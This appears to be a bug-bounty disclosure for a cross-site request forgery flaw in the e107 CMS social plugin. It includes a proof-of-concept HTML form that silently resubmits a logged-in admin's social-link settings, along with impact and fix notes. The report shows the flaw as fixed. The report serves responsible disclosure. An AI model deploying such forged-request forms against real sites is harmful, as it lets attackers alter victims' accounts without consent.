Cross-Site Request Forgery (CSRF) in e107inc/e107


Reported on

Sep 13th 2021

✍️ Description

Attacker or malicious user is able to change social setting if a logged in user visits attacker website. because lack of CSRF token

🕵️‍♂️ Proof of Concept

1.when you logged in open this POC.html in a browser can check unintentionally your facebook page changed to “”

 <script>history.pushState('', '', '/')</script>
   <form action="http://localhost:8181/ecms-full/e107_plugins/social/admin_config.php" method="POST">
     <input type="hidden" name="xurl[facebook]" value="" />
     <input type="hidden" name="xurl[twitter]" value="#" />
     <input type="hidden" name="xurl[youtube]" value="#" />
     <input type="hidden" name="xurl[linkedin]" value="" />
     <input type="hidden" name="xurl[github]" value="" />
     <input type="hidden" name="xurl[flickr]" value="" />
     <input type="hidden" name="xurl[instagram]" value="#" />
     <input type="hidden" name="xurl[pinterest]" value="#" />
     <input type="hidden" name="xurl[steam]" value="" />
     <input type="hidden" name="xurl[vimeo]" value="" />
     <input type="hidden" name="xurl[twitch]" value="" />
     <input type="hidden" name="xurl[vk]" value="" />
     <input type="hidden" name="save_social_pages" value="1" />
     <input type="submit" value="Submit request" />

💥 Impact

This vulnerability is capable of forcing user to unintentional change social settings

💥 Test

Tested version is 2.3 on Firefox and safari.

💥 Fix

You should set a CSRF token on this requeset.


We have contacted a member of the e107inc/e107 team and are waiting to hear back 2 years ago
Cameron marked this as fixed with commit 2682ae 2 years ago
Cameron has been awarded the fix bounty
This vulnerability will not receive a CVE
to join this conversation